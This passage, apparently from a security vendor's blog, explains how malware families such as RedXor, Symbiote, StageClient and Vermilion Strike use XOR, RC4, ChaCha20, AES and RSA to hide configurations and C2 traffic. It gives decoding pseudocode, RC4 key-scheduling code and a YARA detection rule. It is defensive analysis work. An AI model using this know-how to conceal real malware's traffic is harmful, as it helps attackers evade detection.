&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig3.gif" title="A simulation of a rolling XOR encryption." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;A simulation of a rolling XOR encryption.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;A rolling XOR (rotating XOR) is a cryptographic technique that involves
performing the XOR operation on a stream of data in a rolling or rotating
fashion. A repeating key with a fixed length is used to perform the XOR
operation on the data. The key &amp;lsquo;rolls&amp;rsquo; or &amp;lsquo;rotates&amp;rsquo; through the data stream,
applying the XOR operation to each byte of the data with the corresponding byte
from the repeating key. Once the XOR operation is performed on the last byte of
the data, the key is cyclically shifted, and the process starts again from the
beginning of the data.&lt;/p&gt;
&lt;p&gt;Rolling XOR can provide a slight improvement in security compared to regular
XOR encryption with a fixed key because it introduces a level of variation and
complexity. However, similar to basic XOR encryption, rolling XOR is considered
relatively weak and can be broken relatively easily. Yet, due to its
simplicity, it is a very fast encryption routine.&lt;/p&gt;
&lt;h3&gt;XOR Encryption Uses in Malware&lt;span class="hx:absolute hx:-mt-20" id="xor-encryption-uses-in-malware"&gt;&lt;/span&gt;
&lt;a href="#xor-encryption-uses-in-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;a href="../../../2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor"&gt;RedXor&lt;/a&gt;
is a Linux backdoor operated by a Chinese Nation-State Actor. The backdoor
masquerades itself as a polkit daemon and encodes its network data with a
scheme based on XOR. Encoding network data with XOR has been used in previous
Winnti malware, including PWNLNX.&lt;/p&gt;
&lt;p&gt;The decryption logic is a simple XOR against a byte key. The byte key is
incremented by a constant for each item in the buffer. The only configuration
value that is not encrypted is the server port. The port value is used to
derive the key and the address. The key is derived from bit shifting the port
value eight steps to the right.&lt;/p&gt;
&lt;p&gt;The decoding function accepts four arguments: the XOR key, the constant added
to the key byte every round, the encoded buffer, and its length.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig4.png" title="A call to the function that decodes the configuration using XOR." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;A call to the function that decodes the configuration using XOR.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The screenshot below presents the implementation of the XOR encryption. The
highlighted xor operation between the buffer and the key is followed by
including the key and the constant character.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig5.png" title="The decoding function in RedXor." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;The decoding function in RedXor.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The pseudocode of the decryption would look like this:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;doXor(keyChar, adder, buf, buf_len)
{
key = keyChar;
for (i=0; i &amp;lt; buf_len; i&amp;#43;&amp;#43;)
{
buf[i] = key ^ buf[i];
key = key &amp;#43; adder;
}
return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;Symmetric Cryptography&lt;span class="hx:absolute hx:-mt-20" id="symmetric-cryptography"&gt;&lt;/span&gt;
&lt;a href="#symmetric-cryptography" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Symmetric cryptography is when the same key is used to encrypt and decrypt
plaintext and ciphertext. Generally, there are two types of ciphers used in
symmetric encryption. Stream ciphers and Block ciphers.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig6.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h3&gt;Stream Ciphers&lt;span class="hx:absolute hx:-mt-20" id="stream-ciphers"&gt;&lt;/span&gt;
&lt;a href="#stream-ciphers" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;A stream cipher is a type of cipher that encrypts data by combining the
plaintext with a keystream. A keystream is a pseudorandom set of bits that is
generated using a seed. This seed serves as the key. Stream ciphers typically
encrypt a message one bit or byte by XORing them with the keystream. Quite
often, the key for stream cipher does not need to be of a fixed length.&lt;/p&gt;
&lt;p&gt;A popular example of a stream cipher is RC4. RC4 is a stream cipher that was
created by Ron Rivest, one of the creators of the RSA asymmetric cryptosystem.
A number of vulnerabilities have been identified in RC4, which has led to it
being phased out of mainstream encryption use, but due to its simple
implementation, it&amp;rsquo;s still used in malware.&lt;/p&gt;
&lt;h3&gt;Stream Cipher Use in Malware&lt;span class="hx:absolute hx:-mt-20" id="stream-cipher-use-in-malware"&gt;&lt;/span&gt;
&lt;a href="#stream-cipher-use-in-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;As we mentioned, RC4 is commonly used in malware, typically to encrypt
communications between the malware and its command and control (C2) server or
to encrypt its configuration. Although RC4 is not the strongest cipher, it
serves the purpose of scrambling up data enough that there is enough entropy
that defenses are not able to use patterns for detection, like in the case of
XOR encryption in Cobalt Strike. RC4 is also trivial to implement without the
need to import libraries, and it is easy to generate or store a key inside the
malware. The malware Symbiote uses RC4 heavily to encrypt communications and
gather information:&lt;/p&gt;
&lt;p&gt;&lt;a href="../../../2022/06/new-linux-threat-symbiote"&gt;Symbiote Deep-Dive: Analysis of a New, Nearly-Impossible-to-Detect Linux Threat&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Below is a screenshot of the Symbiote usage of RC4. The start of the RC4
algorithm starts by creating the identity permutation, which is a block of
bytes ranging from 0x00 to 0xFF. This is a very distinctive way to identify RC4
usage. After the identity permutation is created, the key bytes will be mixed
in to create the pseudorandom keystream.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig7.png" title="Start of the Key-scheduling algorithm (KSA) in Symbiote" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Start of the Key-scheduling algorithm (KSA) in Symbiote&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Another use of a stream cipher in malware is the use of ChaCha20 in the APT
malware StageClient. ChaCha20 is used to encrypt the configuration, protecting
it from static analysis.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig8.png" title="Call to ChaCha20 with key passed in as parameter in StageClient" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Call to ChaCha20 with key passed in as parameter in StageClient&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;For a visualization of the ChaCha20 cipher, we recommend watching this
Computerphile video:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://youtu.be/UeIpq-C-GSA"target="_blank" rel="noopener"&gt;Chacha Cipher – Computerphile&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig9.png" title="ChaCha20 decrypted StageClient configuration showing C2 address" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;ChaCha20 decrypted StageClient configuration showing C2 address&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Block Ciphers&lt;span class="hx:absolute hx:-mt-20" id="block-ciphers"&gt;&lt;/span&gt;
&lt;a href="#block-ciphers" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Block ciphers are another way of implementing symmetric encryption. Block
ciphers encrypt fixed-size data blocks compared to doing it one bit/byte at a
time, like in a stream cipher. Many block cipher algorithms are very strong,
and therefore, they are heavily used in everyday encryption. Also, because of
the strength of block cipher encryption algorithms, they are also favored as
some of the main components in ransomware, often used in conjunction with
asymmetric cryptography to form a hybrid cryptosystem, which we will discuss
more in a future blog. Block ciphers can have different modes of operation.
Different modes of operation are ways that the block cipher can be applied to
increase the security of the encryption beyond basic blocks. Electronic
Codebook (ECB) is the most basic block mode of operation, simply just
encrypting each block. This is considered weak as data with repeating bytes
will have repeating ciphertext, leading to patterns being able to be discerned.
Another mode, Cipher Block Chaining (CBC), XORs the plaintext block with the
previous ciphertext block to create more randomness and disrupt patterns. The
image below shows a bitmap of the Intezer logo, being AES encrypted with ECB in
the middle and CBC on the right. The logo pattern can still be discerned in the
ECB mode, whereas in CBC, it is completely random. Many modes of operation also
require what is called an initialization vector (IV). An IV is a small piece of
data, usually a random number, that is used to ensure that two identical
plaintext blocks encrypt to different ciphertext blocks, ensuring additional
security and the removal of patterns.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig10.png" title="Intezer logo (left), ECB encrypted (middle), CBC encrypted (right)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Intezer logo (left), ECB encrypted (middle), CBC encrypted (right)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;For AES, there is also an
&lt;a href="https://en.wikipedia.org/wiki/AES_instruction_set"target="_blank" rel="noopener"&gt;instruction set&lt;/a&gt; that is
integrated into many processors. This greatly speeds up the use of AES for
systems using compatible processors. Hardware accelerators for AES make block
encryption with AES quicker than many stream ciphers, which are typically
faster than block ciphers. Most Intel chips support an AES instruction set.
Whereas many ARM chips for mobile phones do not. For this reason, Google Chrome
developers made the cipher suite for
&lt;a href="https://security.googleblog.com/2014/04/speeding-up-and-strengthening-https.html"target="_blank" rel="noopener"&gt;TLS on Android devices&lt;/a&gt;
use the stream cipher ChaCha20, increasing speed and saving battery.&lt;/p&gt;
&lt;h3&gt;Block Cipher Use in Malware&lt;span class="hx:absolute hx:-mt-20" id="block-cipher-use-in-malware"&gt;&lt;/span&gt;
&lt;a href="#block-cipher-use-in-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;AES is one of the most popular symmetric block encryption algorithms. It is
used by many ransomware to quickly and securely encrypt files to hold for
ransom. It is also used to encrypt communications between malware and its C2
server often too. One such example is the Elephant Framework, used to target
organizations in Ukraine:&lt;/p&gt;
&lt;p&gt;&lt;a href="../../../2022/04/elephant-malware-targeting-ukrainian-orgs"&gt;Elephant Framework Delivered in Phishing Attacks Against Ukrainian Organizations&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;AES block encryption is used in multiple places in the malware. One part is the
GraphSteel client component, where AES is used to encrypt WebSockets messages
with the C2. Another area is in the GrimPlant component configuration. The C2
address is passed to the implant through a command line flag &lt;code&gt;-addr&lt;/code&gt;. The
passed argument is base64 decoded, and AES decrypted in CBC mode with a
hardcoded embedded key. In the below screenshot, the constant S-box for AES in
Golang is shown in the GrimPlant component. Golang statically compiles
libraries into the built binary, therefore it is easy to detect when AES is
being used and compare it with the source code.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig11.png" title="Constant AES S-box in GrimPlant component." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Constant AES S-box in GrimPlant component.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Asymmetric Encryption&lt;span class="hx:absolute hx:-mt-20" id="asymmetric-encryption"&gt;&lt;/span&gt;
&lt;a href="#asymmetric-encryption" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Asymmetric encryption, also known as public-key encryption, provides a secure
way to exchange encrypted data between two parties without needing them to
share a common secret key. In asymmetric encryption, each party possesses a key
pair consisting of a public key and a private key. The public key is freely
shared and used for encryption, while the private key is kept secret and used
for decryption. The keys are mathematically related so that data encrypted with
one key can only be decrypted with the corresponding key from the pair.&lt;/p&gt;
&lt;p&gt;Asymmetric encryption involves key generation, encryption of the message using
the recipient&amp;rsquo;s public key, transmission of the encrypted message, and
decryption by the recipient using their private key. This process ensures
secure communication without the need for a shared secret key.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig12.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Asymmetric encryption reduces the need for a secure channel to exchange a
secret key. The public keys can be freely shared without compromising the
security of the encryption. It ensures that only the intended recipient with
the corresponding private key can decrypt and read the encrypted data.&lt;/p&gt;
&lt;p&gt;However, asymmetric encryption is
&lt;a href="https://www.sciencedirect.com/topics/computer-science/asymmetric-encryption#:~:text=asymmetric%20encryption%20is%20far%20slower%20than%20symmetric%20encryption%2C%20and%20is%20also%20weaker%20per%20bit%20of%20key%20length.%20the%20strength%20of%20asymmetric%20encryption%20is%20the%20ability%20to%20securely%20communicate%20without%20pre-sharing%20a%20key."target="_blank" rel="noopener"&gt;generally slower&lt;/a&gt;
and computationally more intensive than symmetric encryption. Therefore, it is
often used for key exchange, digital signatures, and secure communication of
smaller amounts of data.&lt;/p&gt;
&lt;p&gt;There are several well-known asymmetric encryption algorithms:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;RSA (Rivest-Shamir-Adleman): RSA is based on the mathematical properties of
large prime numbers and modular arithmetic.&lt;/li&gt;
&lt;li&gt;Elliptic Curve Cryptography (ECC): ECC leverages the mathematics of elliptic
curves over finite fields. It provides strong security with relatively
smaller key sizes compared to other asymmetric algorithms.&lt;/li&gt;
&lt;li&gt;ElGamal: ElGamal is an asymmetric encryption algorithm based on the
Diffie-Hellman key exchange. It provides both encryption and digital
signature functionalities.&lt;/li&gt;
&lt;li&gt;DSA (Digital Signature Algorithm): DSA is a widely used algorithm for digital
signatures. It ensures data integrity, authentication, and non-repudiation.
DSA is based on mathematical concepts from modular arithmetic and prime
numbers.&lt;/li&gt;
&lt;li&gt;ECDSA (Elliptic Curve Digital Signature Algorithm): ECDSA is an elliptic
curve-based digital signature algorithm. It offers the same security
guarantees as DSA but with shorter key lengths.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each cryptographic system has its specific algorithm for generating a public
key, leading to the use of different sets of elements in each case. To ensure
standardized representation, structured formats have been established. The two
most prevalent definitions for representing public keys are X.509 and
&lt;a href="https://www.rfc-editor.org/rfc/rfc7468"target="_blank" rel="noopener"&gt;PEM&lt;/a&gt; (Privacy Enhanced Mail).&lt;/p&gt;
&lt;p&gt;PEM uses base64 encoding to represent binary data, and it is typically used
with different types of cryptographic data, such as public keys, private keys,
and certificates.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.rfc-editor.org/rfc/rfc5480"target="_blank" rel="noopener"&gt;SubjectPublicKeyInfo&lt;/a&gt; (SPKI) is a
specific format defined in the X.509 specification to represent a public key
and its associated algorithm (such as RSA, DSA, or ECDSA) and optional
parameters.&lt;/p&gt;
&lt;p&gt;PEM is often used as a container format for storing public keys in the
SubjectPublicKeyInfo structure. When a public key is represented in the
SubjectPublicKeyInfo format, it can be encoded and stored in a PEM file by
adding header and footer lines (often &lt;code&gt;BEGIN PUBLIC KEY&lt;/code&gt; and &lt;code&gt;END PUBLIC KEY&lt;/code&gt;)
around the base64-encoded SubjectPublicKeyInfo data.&lt;/p&gt;
&lt;p&gt;PEM is a general encoding format, and when it comes to representing public
keys, SubjectPublicKeyInfo is a specific structure that can be PEM-encoded for
practical use in various cryptographic applications.&lt;/p&gt;
&lt;h3&gt;RSA (Asymmetric Encryption) Uses in Malware&lt;span class="hx:absolute hx:-mt-20" id="rsa-asymmetric-encryption-uses-in-malware"&gt;&lt;/span&gt;
&lt;a href="#rsa-asymmetric-encryption-uses-in-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;In August 2021, our research team discovered a highly sophisticated and fully
undetected malware named
&lt;a href="../../../2021/09/vermilionstrike-reimplementation-cobaltstrike"&gt;Vermilion Strike&lt;/a&gt;.
The malware is a full implementation of Cobalt Strike&amp;rsquo;s beacon targeting Linux
systems and was later also detected in Windows samples, indicating it is a
cross-platform threat. Vermilion Strike utilizes Cobalt Strike&amp;rsquo;s Command and
Control (C2) protocol for communication with the C2 server and possesses remote
access capabilities like file uploading, running shell commands, and file
writing.&lt;/p&gt;
&lt;p&gt;Like the standard Cobalt Strike implementation, Vermilion Strike employs XOR
key encryption to decrypt the beacon&amp;rsquo;s configuration. However, it also utilizes
RSA encryption for encrypting information collected during the fingerprinting
process of the infected endpoint.&lt;/p&gt;
&lt;p&gt;First, the threat imports a public RSA key using a call to
&lt;a href="https://www.openssl.org/docs/man1.0.2/man3/d2i_RSA_PUBKEY.html"target="_blank" rel="noopener"&gt;d2i_rsa_pubkey&lt;/a&gt;,
which decodes and encodes an RSA public key using a SubjectPublicKeyInfo
format.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig13.png" title="RSA public key in Vermilion Strike." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;RSA public key in Vermilion Strike.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Vermilion Strike then gathers specific system information from the compromised
endpoint. The collected data includes details like the kernel version, network
information, current effective user ID of the process, and hostname. Once this
information is assembled, it is formatted into a string.&lt;/p&gt;
&lt;p&gt;Next, the string is encrypted using the public RSA key. RSA encryption ensures
that only the corresponding private key, typically under the control of the
threat actor or C2 server, can decrypt and access the collected data. To
facilitate communication with the Cobalt Strike server, the encrypted data is
then base64 encoded, a common standard for transmitting binary data as text.
The encrypted data is sent to the C2 server in a similar way that the metadata
is sent from a Cobalt Strike beacon to the C2 server.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig14.png" title="The collected information (left), encrypted information(middle), encrypted and encoded information(right)." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;The collected information (left), encrypted information(middle), encrypted and encoded information(right).&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Spotting Encryption in Malware&lt;span class="hx:absolute hx:-mt-20" id="spotting-encryption-in-malware"&gt;&lt;/span&gt;
&lt;a href="#spotting-encryption-in-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;There are several techniques analysts can use to detect the usage of encryption
in malware samples.&lt;/p&gt;
&lt;h3&gt;Imports&lt;span class="hx:absolute hx:-mt-20" id="imports"&gt;&lt;/span&gt;
&lt;a href="#imports" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Usually, one of the first things that would be checked when analyzing a sample
is the list of imported functions, as knowing which functions are being
utilized by the malware can provide valuable insights into the threat&amp;rsquo;s
capabilities. To identify the usage of encryption in malware, we need to look
for cryptographic libraries.&lt;/p&gt;
&lt;p&gt;For malware that targets Windows hosts, we would look for a
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/"target="_blank" rel="noopener"&gt;wincrypt&lt;/a&gt; or
MbedTLS library or a .NET-based API named
&lt;a href="https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-7.0"target="_blank" rel="noopener"&gt;System.Security.Cryptography&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For threats that target Linux hosts, we would look for one (or more) of the
following libraries: OpenSSL, GnuTLS, Mbed TLS, libgcrypt, and Crypto++.&lt;/p&gt;
&lt;p&gt;Since imports can significantly aid researchers (and security tools) in
identifying the usage of specific methods, such as encryption, and facilitate
faster and relatively easier analysis, many malware authors obfuscate
fundamental function imports. Typically, these imports would be dynamically
resolved and loaded by the malware within the relevant function. Consequently,
it becomes more challenging to pinpoint the utilization of imported library
functions.&lt;/p&gt;
&lt;h3&gt;CAPA&lt;span class="hx:absolute hx:-mt-20" id="capa"&gt;&lt;/span&gt;
&lt;a href="#capa" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;a href="https://github.com/mandiant/capa-rules"target="_blank" rel="noopener"&gt;CAPA&lt;/a&gt; is a Python-based open-source
tool developed by FireEye. CAPA stands for &amp;ldquo;Common Analysis Platform for
Artifacts.&amp;rdquo; It is designed to assist in analyzing malware samples by
identifying common patterns and behaviors exhibited by these samples. For
instance: usage of encryption, process creation, communication with C2 servers,
retrieving information from the host, etc. This tool aids in understanding the
potential impact and behavior of malware, enabling faster and more effective
incident response and threat analysis.&lt;/p&gt;
&lt;p&gt;CAPA can be integrated into tools such as IDA, Ghidra, and Radare2 and help
researchers quickly identify known malicious behaviors in a sample. As seen in
the screenshot below, when running CAPA for the Vermilion Strike sample, it
identifies the implementation of RSA and XOR encryption. It provides the
addresses of the relevant functions.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig18.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Having said that, CAPA is not a magic bullet, and in some cases, it might fail
to detect certain behaviors due to unorthodox techniques implemented by threat
actors or novel and non-conventional implementations of certain methods. In
these cases, we would have to rely on other techniques to identify encryption
implementation in malware samples.&lt;/p&gt;
&lt;h3&gt;Identify key parts of the encryption algorithm&lt;span class="hx:absolute hx:-mt-20" id="identify-key-parts-of-the-encryption-algorithm"&gt;&lt;/span&gt;
&lt;a href="#identify-key-parts-of-the-encryption-algorithm" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Identifying key parts of an encryption algorithm in malware requires conducting
a detailed code analysis. Pay close attention to data manipulation involving
boolean algebra operations like AND, NOR, shifts, and various operations for
loading values from the stack (as can be seen in the screenshot below). These
operations often indicate encryption-related transformations and can provide
crucial insights into how the malware encrypts and manipulates data.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig15.png" title="Implementation of encryption using boolean algebra operations." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Implementation of encryption using boolean algebra operations.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;RC4&lt;span class="hx:absolute hx:-mt-20" id="rc4"&gt;&lt;/span&gt;
&lt;a href="#rc4" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;In addition, having knowledge of the general algorithms of commonly used
encryption schemes can significantly aid in quickly identifying the usage of
specific encryption methods. For example, RC4 implements a Key-scheduling
algorithm (KSA) that consists of two for-loops ranging from 0 to 255, as shown
in the following code snippet. Recognizing these distinctive loops can indicate
that the relevant function implements RC4.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;for i from 0 to 255
S[i] := i
endfor
j := 0
for i from 0 to 255
j := (j &amp;#43; S[i] &amp;#43; key[i mod keylength]) mod 256
swap values of S[i] and S[j]
endfor&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Pseudo code for RC4 Key-scheduling algorithm
(&lt;a href="https://en.wikipedia.org/wiki/RC4"target="_blank" rel="noopener"&gt;source&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;Below is the implementation of the code above in the
&lt;a href="../../../2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data"&gt;CryptoClippy&lt;/a&gt;
malware, we can identify the two loops that are part of the KSA algorithm as
described above.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig16.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h4&gt;ChaCha20&lt;span class="hx:absolute hx:-mt-20" id="chacha20"&gt;&lt;/span&gt;
&lt;a href="#chacha20" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;In the key setup stage of the ChaCha20 encryption algorithm, a
&lt;a href="https://xilinx.github.io/Vitis_Libraries/security/2019.2/guide_L1/internals/chacha20.html"target="_blank" rel="noopener"&gt;fixed constant&lt;/a&gt;
string, &lt;code&gt;expand 32-byte k&lt;/code&gt;, as defined in the ChaCha20 specification, is
utilized. This constant serves the purpose, along with a counter and nonce, of
expanding the 256-bit key into a larger 512-bit keystream. The expansion
process is instrumental in generating a robust and secure pseudo-random
keystream, which is crucial for ensuring the confidentiality and integrity of
encrypted data.&lt;/p&gt;
&lt;p&gt;Consequently, the presence of this constant string is a distinctive artifact
that often appears in malware samples, hinting at the potential usage of
ChaCha20 encryption. Below is the constant string in StageClient, along with
the beginning of the initialization state, with the
&lt;a href="https://github.com/shiffthq/chacha20/blob/master/src/chacha20.c"target="_blank" rel="noopener"&gt;source code&lt;/a&gt;
for comparison.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig17.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The following Yara rule can be used to check for the likely use of ChaCha20
using the constant string.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;rule likely_use_of_chacha20
{
meta:
author = &amp;#34;Intezer&amp;#34;
description = &amp;#34;Likely use of ChaCha20 Cipher&amp;#34;
reference = &amp;#34;https://intezer.com/blog/research/unraveling-malware-encryption-secrets/&amp;#34;
hash = &amp;#34;9b48822bd6065a2ad2c6972003920f713fe2cb750ec13a886efee7b570c111a5&amp;#34;
strings:
$mov_bytes = {?? ?? ?? ?? 65 78 70 61 ?? ?? ?? ?? 6E 64 20 33 ?? ?? ?? ?? 32 2D 62 79 ?? ?? ?? ?? 74 65 20 6B}
$string_literal = &amp;#34;expand 32-byte k&amp;#34;
condition:
any of them
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;AES&lt;span class="hx:absolute hx:-mt-20" id="aes"&gt;&lt;/span&gt;
